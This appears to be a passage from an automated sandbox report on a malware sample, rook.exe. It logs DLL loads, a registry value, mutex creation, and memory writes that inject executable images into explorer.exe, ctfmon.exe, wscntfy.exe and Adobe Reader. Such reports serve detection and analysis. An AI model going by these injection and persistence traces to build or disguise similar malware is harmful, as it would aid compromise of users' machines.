\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\WINSPOOL.DRV write and read and execute unknown 7C9C0000 8482816 own pid read write object name not found 1
C:\WINDOWS\system32\winspool.drv query and write and read and execute image 73000000 155648 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 360000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 3B0000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 3B0000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
C:\WINDOWS\system32\compstui.dll read commit 2DA0000 229376 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 2DA0000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 3E0000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 3E0000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 3E0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 2E20000 618496 own pid readonly success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 2ED0000 8462336 own pid readonly success or wait 1
\KnownDlls\WS2_32.dll write and read and execute unknown 2ED0000 8462336 own pid readonly object name not found 1
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1
\KnownDlls\WS2HELP.dll write and read and execute unknown 71AB0000 94208 own pid read write object name not found 1
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1
\KnownDlls\CRYPT32.dll write and read and execute unknown 77A80000 610304 own pid read write success or wait 1
\KnownDlls\MSASN1.dll write and read and execute unknown 77B20000 73728 own pid read write success or wait 1
\KnownDlls\WININET.dll write and read and execute unknown 771B0000 696320 own pid read write success or wait 1
C:\WINDOWS\system32\wininet.dll read commit 7FF0000 667648 own pid readonly success or wait 1
unknown query and write and read commit 2E60000 16384 own pid read write success or wait 1
unknown query and write and read commit 2E60000 16384 own pid read write success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
Registry Activities:
+ Key value set
Key Path Name Type Data Completion Count Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir 19j6cd23 Binary B2 D1 23 A5 17 5F 5B A1 9C B3 02 A6 DB 73 success or wait 1 405F0A
+ Key value queried
Key Path Name Completion Count Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders 15807505 object name not found 1 405F47
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders 19j6cd23 object name not found 1 405F47
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\Local\{DB295FE4-E198-6ACC-FB56-FD56EA1DDE44} success or wait 1 41AFE8
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-215D-B06D3016937F} success or wait 2 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-6D5C-B06D7C17937F} success or wait 2 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-055F-B06D1414937F} success or wait 2 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-455F-B06D5414937F} success or wait 2 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-8D5F-B06D9C14937F} success or wait 2 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-915F-B06D8014937F} success or wait 2 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-595E-B06D4815937F} success or wait 2 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-F15E-B06DE015937F} success or wait 2 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-0959-B06D1812937F} success or wait 2 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-4D59-B06D5C12937F} success or wait 2 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-D159-B06DC012937F} success or wait 2 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-D558-B06DC413937F} success or wait 1 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-AD5B-B06DBC10937F} success or wait 2 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-DD5D-B06DCC16937F} success or wait 2 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-AD5C-B06DBC17937F} success or wait 2 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-D95B-B06DC810937F} success or wait 1 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-615A-B06D7011937F} success or wait 1 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-7D5A-B06D6C11937F} success or wait 2 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-555B-B06D4410937F} success or wait 2 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-955B-B06D8410937F} object name exists 2 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-E15B-B06DF010937F} success or wait 1 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-615F-B06D7014937F} object name exists 2 41A78C
Process Activities:
+ Process terminated
PID Filepath Completion Count Source Address
488 C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe success or wait 1 41B403
488 C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe success or wait 0 41B403
Memory Activities:
+ Memory written
PID Filepath Base Length Value Completion Count Source Address
1520 C:\WINDOWS\explorer.exe 1480000 217088 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 success or wait 1 413F96
1520 C:\WINDOWS\explorer.exe 14B01F0 4 00 00 00 00 success or wait 1 41A8A9
1520 C:\WINDOWS\explorer.exe 14B0204 4 00 00 48 01 success or wait 1 41A8C9
1520 C:\WINDOWS\explorer.exe 14B06C8 4 B8 06 00 00 success or wait 1 41A0D4
1520 C:\WINDOWS\explorer.exe 14B06CC 4 00 06 00 00 success or wait 1 41A0D4
1788 C:\WINDOWS\system32\ctfmon.exe 1110000 217088 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 success or wait 1 413F96
1788 C:\WINDOWS\system32\ctfmon.exe 11401F0 4 00 00 00 00 success or wait 1 41A8A9
1788 C:\WINDOWS\system32\ctfmon.exe 1140204 4 00 00 11 01 success or wait 1 41A8C9
1788 C:\WINDOWS\system32\ctfmon.exe 11406C8 4 44 01 00 00 success or wait 1 41A0D4
1788 C:\WINDOWS\system32\ctfmon.exe 11406CC 4 A4 01 00 00 success or wait 1 41A0D4
1860 C:\WINDOWS\system32\wscntfy.exe AE0000 217088 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 success or wait 1 413F96
1860 C:\WINDOWS\system32\wscntfy.exe B101F0 4 00 00 00 00 success or wait 1 41A8A9
1860 C:\WINDOWS\system32\wscntfy.exe B10204 4 00 00 AE 00 success or wait 1 41A8C9
1860 C:\WINDOWS\system32\wscntfy.exe B106C8 4 9C 00 00 00 success or wait 1 41A0D4
1860 C:\WINDOWS\system32\wscntfy.exe B106CC 4 A0 00 00 00 success or wait 1 41A0D4
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 5FC0000 217088 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 success or wait 1 413F96
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 5FF01F0 4 00 00 00 00 success or wait 1 41A8A9
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 5FF0204 4 00 00 FC 05 success or wait 1 41A8C9
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 5FF06C8 4 9C 03 00 00 success or wait 1 41A0D4
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 5FF06CC 4 94 03 00 00 success or wait 1 41A0D4
+ Memory allocated
PID Filepath Base Length Protection Completion Count Source Address
488 C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe 2E40000 13FF9C page execute and read and write success or wait 1 4E4097
488 C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe 2ED0000 13FCA4 page execute and read and write success or wait 1 2E40307
488 C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe 7FF0000 13F8E0 page read and write success or wait 1 41A5EB
488 C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe 7FF0000 13F8E4 page read and write success or wait 1 41A5EB
488 C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe 2E60000 13F49C page read and write success or wait 1 411C3E
1520 C:\WINDOWS\explorer.exe 1480000 13F1FC page execute and read and write success or wait 1 413F5F
1788 C:\WINDOWS\system32\ctfmon.exe 1110000 13F1FC page execute and read and write success or wait 1 413F5F
1860 C:\WINDOWS\system32\wscntfy.exe AE0000 13F1FC page execute and read and write success or wait 1 413F5F
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 5FC0000 13F1FC page execute and read and write success or wait 1 413F5F
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
488 C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe 400000 1000 page read and write page readonly success or wait 1 287F737
488 C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe 400000 1000 page readonly page read and write success or wait 1 287F74C
488 C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe 40050A 2446000 page execute and read and write page readonly success or wait 1 4E404E
System Activities:
+ System information queried
System info class Completion Count Source Address
ProcessInformation success or wait 2 40A459
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2599261498
Section loaded Path: unknown Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2599265354
Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 270000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 2599291089
Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 290000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2599293975
Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 2E0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2599295403
Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 2599295734
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2599297096
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2599297252
Section loaded Path: \KnownDlls\compstui.dll Access: write and read and execute Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2599299638
Section loaded Path: C:\WINDOWS\system32\compstui.dll Access: query and write and read and execute Type: image Baseaddress: 6E680000 Size: 241664 Protection: read write Mapped to pid: own pid success or wait 2599300328
Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 2599302081
Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 2599306519
Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 2599307785
Section loaded Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 2599315002
Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 2599317780
Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 2599321227
Section loaded Path: \KnownDlls\MSIMG32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid object name not found 2599325599
Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 2599326304
Section loaded Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2599328769
Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 2599331140
Section loaded Path: \KnownDlls\ddraw.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid object name not found 2599335723
Section loaded Path: C:\WINDOWS\system32\ddraw.dll Access: query and write and read and execute Type: image Baseaddress: 73760000 Size: 307200 Protection: read write Mapped to pid: own pid success or wait 2599336420
Section loaded Path: \KnownDlls\DCIMAN32.dll Access: write and read and execute Type: unknown Baseaddress: 73760000 Size: 307200 Protection: read write Mapped to pid: own pid object name not found 2599338024
Section loaded Path: C:\WINDOWS\system32\dciman32.dll Access: query and write and read and execute Type: image Baseaddress: 73BC0000 Size: 24576 Protection: read write Mapped to pid: own pid success or wait 2599338996
Section loaded Path: \KnownDlls\resutils.dll Access: write and read and execute Type: unknown Baseaddress: 73BC0000 Size: 24576 Protection: read write Mapped to pid: own pid object name not found 2599343119
Section loaded Path: C:\WINDOWS\system32\resutils.dll Access: query and write and read and execute Type: image Baseaddress: 750B0000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2599343801
Section loaded Path: \KnownDlls\CLUSAPI.dll Access: write and read and execute Type: unknown Baseaddress: 750B0000 Size: 73728 Protection: read write Mapped to pid: own pid object name not found 2599345928
Section loaded Path: C:\WINDOWS\system32\clusapi.dll Access: query and write and read and execute Type: image Baseaddress: 76D10000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2599346459
Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 2599350620
Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 2599356603
Section loaded Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid success or wait 2599362697
Section loaded Path: \KnownDlls\scarddlg.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid object name not found 2599367331
Section loaded Path: C:\WINDOWS\system32\scarddlg.dll Access: query and write and read and execute Type: image Baseaddress: 5CFE0000 Size: 90112 Protection: read write Mapped to pid: own pid success or wait 2599368003
Section loaded Path: \KnownDlls\MFC42u.DLL Access: write and read and execute Type: unknown Baseaddress: 5CFE0000 Size: 90112 Protection: read write Mapped to pid: own pid object name not found 2599369548
Section loaded Path: C:\WINDOWS\system32\mfc42u.dll Access: query and write and read and execute Type: image Baseaddress: 72830000 Size: 991232 Protection: read write Mapped to pid: own pid success or wait 2599370224
Section loaded Path: \KnownDlls\WinSCard.dll Access: write and read and execute Type: unknown Baseaddress: 72830000 Size: 991232 Protection: read write Mapped to pid: own pid object name not found 2599376229
Section loaded Path: C:\WINDOWS\system32\winscard.dll Access: query and write and read and execute Type: image Baseaddress: 723D0000 Size: 114688 Protection: read write Mapped to pid: own pid success or wait 2599376923
Section loaded Path: \KnownDlls\WTSAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 723D0000 Size: 114688 Protection: read write Mapped to pid: own pid object name not found 2599379718
Section loaded Path: C:\WINDOWS\system32\wtsapi32.dll Access: query and write and read and execute Type: image Baseaddress: 76F50000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2599380973
Section loaded Path: \KnownDlls\WINSTA.dll Access: write and read and execute Type: unknown Baseaddress: 76F50000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 2599384020
Section loaded Path: C:\WINDOWS\system32\winsta.dll Access: query and write and read and execute Type: image Baseaddress: 76360000 Size: 65536 Protection: read write Mapped to pid: own pid success or wait 2599384744
Section loaded Path: \KnownDlls\NETAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 2599386903
Section loaded Path: \KnownDlls\COMCTL32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 2599393137
Section loaded Path: \KnownDlls\ShimEng.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid object name not found 2599397972
Section loaded Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid success or wait 2599398615
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 28C0000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2599403137
Section loaded Path: C:\WINDOWS\AppPatch\aclayers.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 475136 Protection: execute Mapped to pid: own pid success or wait 2599408726
Section loaded Path: C:\WINDOWS\AppPatch\aclayers.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 475136 Protection: execute Mapped to pid: own pid success or wait 2599410279
Section loaded Path: C:\WINDOWS\AppPatch\aclayers.dll Access: query and write and read and execute Type: image Baseaddress: 71590000 Size: 495616 Protection: read write Mapped to pid: own pid success or wait 2599411143
Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 2599414711
Section loaded Path: \KnownDlls\WINSPOOL.DRV Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid object name not found 2599422588
Section loaded Path: C:\WINDOWS\system32\winspool.drv Access: query and write and read and execute Type: image Baseaddress: 73000000 Size: 155648 Protection: read write Mapped to pid: own pid success or wait 2599423286
Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 360000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2599432134
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 3B0000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2599538712
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 3B0000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2599573165
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 2599574087
Section loaded Path: C:\WINDOWS\system32\compstui.dll Access: read Type: commit Baseaddress: 2DA0000 Size: 229376 Protection: readonly Mapped to pid: own pid success or wait 2599591963
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 2DA0000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 2599617565
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 2599688611
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 3E0000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 2599759653
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 3E0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2599761443
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 3E0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2599762438
Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 2E20000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 2599820547
Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 2ED0000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 2599859152
Memory attributes changed PID: 488 Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Base: 400000 Length: 1000 New Protection: page read and write Old Protection: page readonly success or wait 2613281912
Memory attributes changed PID: 488 Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Base: 400000 Length: 1000 New Protection: page readonly Old Protection: page read and write success or wait 2613282566
Memory attributes changed PID: 488 Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Base: 40050A Length: 2446000 New Protection: page execute and read and write Old Protection: page readonly success or wait 2613284023
Memory allocated PID: 488 Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Base: 2E40000 Length: 13FF9C Allocation Type: null Protection: page execute and read and write success or wait 2613305074
Memory allocated PID: 488 Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Base: 2ED0000 Length: 13FCA4 Allocation Type: null Protection: page execute and read and write success or wait 2613306821
Section loaded Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: 2ED0000 Size: 8462336 Protection: readonly Mapped to pid: own pid object name not found 2613396149
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 2613396858
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid object name not found 2613399093
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2613399692
Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 2613407378
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2613408974
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 771B0000 Size: 696320 Protection: read write Mapped to pid: own pid success or wait 2613418302
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: read Type: commit Baseaddress: 7FF0000 Size: 667648 Protection: readonly Mapped to pid: own pid success or wait 2613424299
Memory allocated PID: 488 Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Base: 7FF0000 Length: 13F8E0 Allocation Type: null Protection: page read and write success or wait 2613490031
Memory allocated PID: 488 Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Base: 7FF0000 Length: 13F8E4 Allocation Type: null Protection: page read and write success or wait 2613490175
File opened Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2613535421
Memory allocated PID: 488 Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Base: 2E60000 Length: 13F49C Allocation Type: null Protection: page read and write success or wait 2613535751
File read Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Offset: none Length: 257536 Value: 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 BA 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90 54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73 74 20 62 65 success or wait 2613535848
Mutant created Name: \BaseNamedObjects\Local\{DB295FE4-E198-6ACC-FB56-FD56EA1DDE44} success or wait 2613760787
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Name: 15807505 object name not found 2613761109
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Name: 19j6cd23 object name not found 2613761355
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 19j6cd23 Type: Binary Data: B2 D1 23 A5 17 5F 5B A1 9C B3 02 A6 DB 73 success or wait 2613761818
System info queried Type: ProcessInformation success or wait 2613766174
